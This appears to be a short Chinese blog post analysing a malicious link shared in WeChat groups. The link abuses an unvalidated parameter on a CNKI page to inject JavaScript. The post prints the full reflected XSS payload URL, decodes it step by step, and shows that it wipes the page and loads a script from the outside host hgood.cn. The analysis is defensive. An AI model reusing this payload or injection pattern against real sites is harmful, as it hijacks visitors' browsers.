今天在微信群出现一个关于华为的H5,借着热门话题赚流量,点了一下发现果然有问题,最后弹出来的是不太好的网页。
简单分析了一下网址:
http://medmap.cnki.net/refbook/AddComment.aspx?type=0&isadd=0&bid=%22%2C%29%3B%7DsetTimeout%28atob%28%27ZG9jdW1lbnQuYm9keS5pbm5lckhUTUwgPSAnJztkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vaGdvb2QuY24vZCc7%27%29%2C0%29%3Bfunction%20postc%28%29%20%7B%2F%2F%26name%3D
竟然是知网的域名,按说知网不至于干这个,多半是被植入了。再看里面有一个function,基本上可以判断是url参数被js调用时没有检验,被挂了js代码进去。把URL做一个DECODE,结果如下:
http://medmap.cnki.net/refbook/AddComment.aspx?type=0&isadd=0&bid=”,);}setTimeout(atob(‘ZG9jdW1lbnQuYm9keS5pbm5lckhUTUwgPSAnJztkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vaGdvb2QuY24vZCc7’),0);function postc() {//&name=
这就看到了setTimeout定时器,里面的atob是base64解码,解码结果如下:
document.body.innerHTML = ”;document.head.appendChild(document.createElement(‘script’)).src=’//hgood.cn/d’;
好了,hgood.cn,这就是目标。干坏事的是它,栽赃到知网。
把这个结果告诉知网以后,发现,植入内容也变了。
